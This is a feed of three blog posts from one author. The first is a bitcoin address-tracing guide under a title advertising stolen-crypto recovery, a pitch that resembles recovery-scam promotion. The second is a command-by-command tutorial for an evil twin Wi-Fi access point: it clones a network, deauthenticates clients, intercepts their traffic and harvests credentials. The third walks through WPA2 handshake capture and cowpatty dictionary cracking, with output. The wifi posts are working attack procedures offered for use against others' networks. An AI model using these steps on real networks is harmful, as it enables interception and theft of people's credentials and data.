DEV Community: TheScott12

Y3llowl4bs: Cryptocurrency scam investigation | Recover stolen bitcoin

TheScott12 — Sun, 04 Jun 2023 00:11:04 +0000

Bitcoin Investigations - How to trace bitcoin addresses.

Bitcoin offers a unique opportunity for financial investigation in that an amateur can easily research a given person’s bitcoin usage. The most basic framework of financial investigation consists of identifying a target, searching for negative information about them or their past, identifying the target’s associates, and then searching for negative information on them. Bitcoin lends itself perfectly to this kind of investigation.

Background information on bitcoin

For those that have no knowledge of bitcoin here is the necessary background information before we start. Bitcoin is only one of many cryptocurrencies. For the purposes of this post, we will focus only on bitcoin. Bitcoin, by design, makes the person anonymous but all of their financial transactions are public.

If, for example, someone named Asma wants bitcoin she must get a “wallet,” which will contain one or several bitcoin “addresses.” An address can hold money, send money to another address, and receive money. Asma’s bitcoin activity is public, but her name and identity are theoretically anonymous.

In a scenario where we are given a specific bitcoin address (whether it is anonymous or owned by a known business associate), the following are steps that we can take to investigate and trace bitcoin addresses.

How to trace bitcoin addresses

Blockchain

The Blockchain itself is complex and beyond the scope of this post, but its website, Blockchain, is a useful tool. The site allows one to look up a bitcoin address and see all of its past financial transactions in addition to how much currency it currently owns. Every transaction, each time the bitcoin address sent or received money, is listed along with the date, the amount of money transferred, as well as the bitcoin addresses that sent and received the money.

Below is an example of how one transaction is displayed on Blockchain.com.

This may appear confusing but it is quite simple if you know what you are looking at. Below is the same transactions but I put colored rectangles in the photo to make it more easily understood. Each transaction has a unique string of numbers and letters (in the red rectangle below) that identifies a specific transaction. This transaction ID is known as a “hash.” Bear in mind that in other contexts, the word hash is used differently.

The bitcoin addresses are also identified by random strings of numbers and letters. The string in the orange rectangle is the ID for a bitcoin address. The address in orange is sending money to a second address that is in a green rectangle. The orange address is sending 0.1988 bitcoin. Note that the acronym used in the photo “BTC” just means bitcoin. A small amount of the bitcoin will go to a fee (seen below the orange address) and the remainder will go to the green address.

The number to the write of the green address is the amount received after the fee. And finally on the top right is the date and time of the transaction. For further investigation click on the green address to see what happened with the money next, or click on the orange address to try to find where the money came from.

Note that bitcoin has “exchanges” where people buy and sell bitcoins. If you find a bitcoin address that has conducted hundreds of thousands of transactions, it is probably owned by exchange, not a person. If you want to be sure try googling the bitcoin address because many exchanges publicly identify their addresses.

Use Wallet Explorer to find other wallets

Each bitcoin address is contained in a wallet that may have more addresses. Walletexplorer allows one to find the wallet containing the address of interest (the wallet has its own unique number to identify it). This site also allows one to find if there are other addresses in the same wallet. If there are other addresses in the same wallet this means that the person that same person owns the wallet and all of the addresses in it. Therefore, finding the wallet is a great way to find if the owner of one address is also the owner of others.

OXT

Another interesting blockchain explorer is the “open exploration tool” (OXT), an exploratory blockchain analysis tool. Just like any other blockchain explorer OXT can display transactions happening on the Bitcoin network. However, the website also analyzes different types of behavior on the Bitcoin blockchain using various charting and plotting tools. This includes temporal charts covering fees, transactions, scripts, and more. OXT also offers to scatter plots as well giving a different perspective on transaction and bitcoin address behavior.

Other popular blockchain explorers that provide similar transaction data and some charts include Blockcypher, Insight, Blocktrail, and Sochain. Each explorer shows blockchain data a little different but more or less contains the same information about transactions.

Network Statistics Charts and Plotting Tools

Grafana

The website Statoshi.info has a lot of real-time Bitcoin network statistics. The website’s individual dashboards show node counts, bandwidth usage, fee estimates, system metrics, mempool data, and more. Grafana has been around for a few years now, and each dashboard display shows various charts that analyze particular sections of the network and protocol’s behavior.

Bitcoin Wisdom

Bitcoin Wisdom is also another charting website that’s been around for quite some time. The website’s price charts are one of the most popular sections within the web portal. Bitcoin Wisdom’s price charts display various exchanges including Bitstamp, BTCC, Kraken, Bitfinex, and more. Furthermore, Bitcoin Wisdom also shows other statistical data such as network difficulty, and the past and present hash rate.

Tradeblock

Another website that reports statistical Bitcoin network data includes Tradeblock. The Tradeblock engine offers a wide variety of graphical charts displaying both historical and current Bitcoin statistics. The website’s interface displays the mempool count, blocks mined, transaction count, and many more useful network diagrams. Tradeblock also monitors the Ethereum blockchain and has its own blockchain explorers as well.

Blockseer

Blockseer is another exploratory blockchain tool that wants users to “follow the bitcoin.” The tool shows a visual interpretation of transactions on the network alongside the connections each transaction has with individual addresses. The site traces bitcoin origins and follows the path of bitcoins traveling throughout the blockchain using a visual diagram.

Websites That Track Nodes

Node Counter

Node Counter is an analytical website that tracks Bitcoin nodes throughout the network. This includes Bitcoin Classic, Bitcoin Unlimited (BU), XT, and Core nodes in a graphical setting. Each table shows various nodes within the network alongside pools signaling alternate Bitcoin clients and block size proposals. Node counter displays data using both line graphs and pie charts as well.

Bitnodes

21 Inc’s Bitnodes is another popular node tracking website that displays various charts and graphs concerning Bitcoin network nodes. The site gives a current network snapshot and also a search engine to check on node status. Bitnodes also displays Classic, BU, Core, and XT nodes within the network.

Coin Dance

Last but not least in the node counting realm is the website Coin Dance which shows various summaries and charts concerning nodes across the network. The graphical interface also charts the different node implementations like Core and XT with many types of charts. Furthermore, Coin Dance is a popular site for many other statistics such as Localbitcoins and Paxful volumes, and even charts on political opinions in regards to Segregated Witness, Emergent Consensus, and the most recent UASF (BIP 148) support from well-known industry businesses.

Visualizing the Bitcoin Network, Just Got a Whole Lot Easier

All of these monitoring websites offer a different view of the network, and each one has various merits depending on what you’re looking for. The information these tools provide can improve our relationship with the network by getting a better understanding of what’s going on. A graphical display is sometimes a better method for people interpreting network activity and the protocol's behavior.

The Internet of Money’s transaction value lookup where users can look up the value of a transaction in the past.

The Internet of Money also has a tool section and various statistical information that can be found on our website as well. Using our transaction value lookup tool simply add a bitcoin transaction TXID and find it’s price in the past. For those who are extremely passionate about the subject of Bitcoin, there’s plenty of statistics and information to gather each and every day.

How to Create an Evil Twin Access Point; Step-by-Step Guide

TheScott12 — Sat, 03 Jun 2023 23:41:39 +0000

Step-by-Step Guide: Creating an Evil Twin

An Evil Twin Access Point is a malicious wireless access point that is set up to mimic a legitimate one. It can be used to intercept sensitive information such as login credentials, credit card information, and other private data.

In this post, I will provide a step-by-step guide on how to create an Evil Twin Access Point. You will learn how to set up a fake access point that looks like the real one, and how to intercept data from unsuspecting victims.

Follow our guide and learn how to create an Evil Twin Access Point in just a few easy steps.

*What is an Evil Twin Access Point?
*
An evil twin is a fake wireless access point that appears as a genuine hotspot offered by a legitimate provider. The idea is to set up a malicious wireless network with the same SSID name as the original one.

Devices connecting to a Wi-Fi network like laptops, tablets, and smartphones have no way to distinguish between two Wi-Fi networks with the same SSID name. This enables hackers to set up malicious wireless networks that can capture traffic and extract sensitive information from victims.

*Enable Monitor Mode
*
To start with this tutorial, ensure that your wireless card is compatible with the aircrack-ng suite and has monitor mode enabled.

Aircrack-ng is a popular set of tools used to crack wireless networks. It is a suite of tools that includes aircrack-ng (for cracking WEP and WPA-PSK keys), airmon-ng (for setting up monitor mode on wireless cards), and airodump-ng (for capturing wireless traffic).

Aircrack-ng is an open-source project and is available for Windows, Linux, and macOS. You can verify if it's functioning correctly by entering the following command:

airmon-ng check kill

This command will check if the wireless card is supported by the aircrack-ng suite and also disable any processes that may interfere with it.

The next step is to enable monitor mode on your wireless interface. This can be accomplished by executing the airmon-ng start wlan0 command.

airmon-ng start wlan0

This will change wlan0 to wlan0mon, which indicates that your wireless interface is now in monitor mode.

*Locate the Target Wireless Network
*
The second step is to start scanning nearby wireless routers and locate the Wi-Fi network which you want to clone. Execute the following command:

airodump-ng wlan0mon
CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:02:33:38:86 -42 17 0 0 11 54e WPA2 CCMP PSK CISCO-Net

BSSID STATION PWR Rate Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1

The wireless network I will be cloning in this tutorial is the SkyNet network with BSSID 28:EF:01:35:34:85 and channel 6.

Create the Evil Twin

Once you’ve found the network which you wish to clone, run the following command in another terminal:

airbase-ng -a 28:EF:01:35:34:85 –e SkyNet -c 6 wlan0mon
$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
21:39:29  Created tap interface at0
21:39:29  Trying to set MTU on at0 to 1500
21:39:29  Trying to set MTU on wlan0mon to 1800
21:39:29  Access Point with BSSID 28:EF:01:35:34:85 started.

This command creates an Evil Twin network with the SSID name SkyNet, however, it will not be able to provide internet access yet.

Provide Internet Access to the Evil Twin

I will add the bridge interface, called fake, you can name it any way you like.

brctl addbr fake

Now add the two interfaces you’re bridging, eth0 and at0 (make sure eth0 has internet access).

brctl addif fake eth0
brctl addif fake at0

Assign IP addresses to the interface and bring them up using ifconfig:

ifconfig at0 0.0.0.0 up
ifconfig fake up

You can take a look at the bridge network interface with ifconfig:

ifconfig
at0       Link encap:Ethernet  HWaddr 74:85:2a  
inet6 addr: fe80::7685:2aff:5b08/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:4 errors:0 dropped:0 overruns:0 frame:0
TX packets:349 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500 
RX bytes:540 (540.0 B)  TX bytes:54845 (53.3 KiB)
eth0 Link encap:Ethernet HWaddr c8:bc:c8
inet addr:10.0.0.19 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::cabc:a6c1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:640 errors:0 dropped:0 overruns:0 frame:0
TX packets:529 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:457344 (446.6 KiB) TX bytes:94347 (92.2 KiB)
Interrupt:17
fake Link encap:Ethernet HWaddr 74:85:2a
inet addr:10.0.0.194 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80:::fe97:5b08/64 Scope:Link
inet6 addr: 2601:d335:7685:2aff:fe97:5b08/64 Scope:Global
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:859 errors:0 dropped:0 overruns:0 frame:0
TX packets:684 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:492405 (480.8 KiB) TX bytes:130130 (127.0 KiB)

*Kick Wireless Clients from the Legitimate AP
*
The next step is to kick wireless clients off the legitimate AP, in my case, that’s SkyNet network. You can do this by using aireplay-ng.

aireplay-ng --deauth 1000 -a 28:EF:01:35:34:85 wlan0mon

This command kicks wireless clients from the real access point network, forcing them to connect to the malicious access point.

As you can see in the output below, a client has associated with my evil twin. This information is found in the airebase-ng terminal (client 28:EF:01:23:46:68 associated).

$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
14:50:56  Created tap interface at0
14:50:56  Trying to set MTU on at0 to 1500
14:50:56  Trying to set MTU on wlan5 to 1800
14:50:56  Access Point with BSSID 28:EF:01:35:34:85 started.
14:58:55  Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
15:03:24  Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"

At this point, all the victim’s traffic is going through the attacker’s machine, he or she can capture sensitive information since it’s technically a Man-in-the-Middle attack.

The attacker can perform various attacks like DNS spoofing which redirects the victim to a cloned or fake login page. Once the victim tries to login, the hacker harvests the credentials.

Conclusion

In today's digital age, using public Wi-Fi networks has become a common practice for many people. However, it's important to be aware of the risks associated with connecting to these networks, as they can be vulnerable to cyber-attacks and hacking attempts.

How to Speed up the WPA/WPA2 Password Cracking Process using Cowpatty

TheScott12 — Sat, 03 Jun 2023 23:27:32 +0000

Requirements:

Kali Linux Operating System.

Handshake File of the Network that You Want to Hack.

Wordlist.

Cowpatty, by Joshua Wright, is a tool that automates offline dictionary attacks for cracking WPA2-PSK passwords. Cowpatty supports using a pre-computed hash file rather than a plain-text word file.

This can speed up the obtaining process of the “lost” WPA/WPA2 key of your access point. Pre-computed hash files are used to accelerate password brute force when cracking WPA.

They do this by eliminating the need to perform the costly transformation of a password into an encryption key.

Cowpatty

To get a brief rundown of the options, type cowpatty in the terminal:

cowpatty
cowpatty 4.8 - WPA-PSK dictionary attack.

Usage: cowpatty [options]

-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-c Check for valid 4-way frames, does not crack
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

Kali Linux will provide you with a brief help screen. Cowpatty requires all of the following:

**A word list.

A file where the password hash has been captured.

The SSID of the target AP.
**
Put the Wireless Adapter in Monitor Mode

You need to put the wireless adapter into monitor mode by typing

airmon-ng start wlan0

(assuming your interface name is wlan0).

airmon-ng start wlan0

This command will change your wireless interface name to wlan0mon.

Find The Target

Start scanning nearby wireless routers using your monitor interface:

airodump-ng wlan0mon
CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:02:33:38:86 -42 17 0 0 11 54e WPA2 CCMP PSK CISCO-Net

BSSID STATION PWR Rate Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1

Capture the Handshake

Next, you need to start capturing the 4-way handshake file where the hashed password will be stored.

airodump-ng — bssid 28:EF:01:35:34:85 -c 6 -w handshake wlan0mon

This will start a dump on the selected AP (28:EF:01:35:34:85), on the selected channel (-c 6), and save the hash in a file named handshake.

CH  6][ Elapsed: 4 s ][ 2014-03-24 17:51 ][ WPA handshake: 28:EF:01:35:34:85

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

28:EF:01:35:34:85 39 100 51 0 0 6 54 WPA2 CCMP PSK SkyNet

BSSID STATION PWR Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1

If someone connects to the AP, I will capture the hash and airodump-ng will show me it has been captured in the upper right-hand corner (WPA handshake: 28:EF:01:35:34:85).

Run Cowpatty

Now that I have the hash of the password, I can use it with cowpatty and the wordlist to crack the hash.

cowpatty -f wordlist.txt -r handshake-01.cap -s SkyNet
cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 1000: angelgirl
key no. 2000: missouri
key no. 3000: birdsong

The PSK is "justletmein".

2000 passphrases tested in 294.42 seconds: 50000.00 passphrases/second

Cowpatty is generating a hash of every word on the wordlist with the SSID as a seed and compares it to the captured hash. When the hashes match, it displays the password of the AP. This process is very CPU intensive and slow.

Cowpatty now supports using a pre-computed hash file rather than a plain-text word file, making the cracking of the WPA2-PSK password much faster.

You can generate your own hashes for the target SSID using a tool called genpmk.

genpmk -f wordlist.txt -d hash -s SkyNet
genpmk 1.3 - WPA-PSK precomputation attack. <jwright@hasborg.com>
File cowpatty_dict does not exist, creating.
key no. 1000: pinkgirl
key no. 2000: lovecandy
key no. 3000: steve2006
key no. 4000: honeycow

2641 passphrases tested in 4.60 seconds: 451.00 passphrases/second

Once you have generated the hash for the particular SSID, you can then crack the password with cowpatty by typing:

cowpatty -d hash -r handshake-01.cap -s SkyNet

-d argument is for pre-calculated pmk hash name,

-r is for capture handshake file.

-s is for ESSID network name.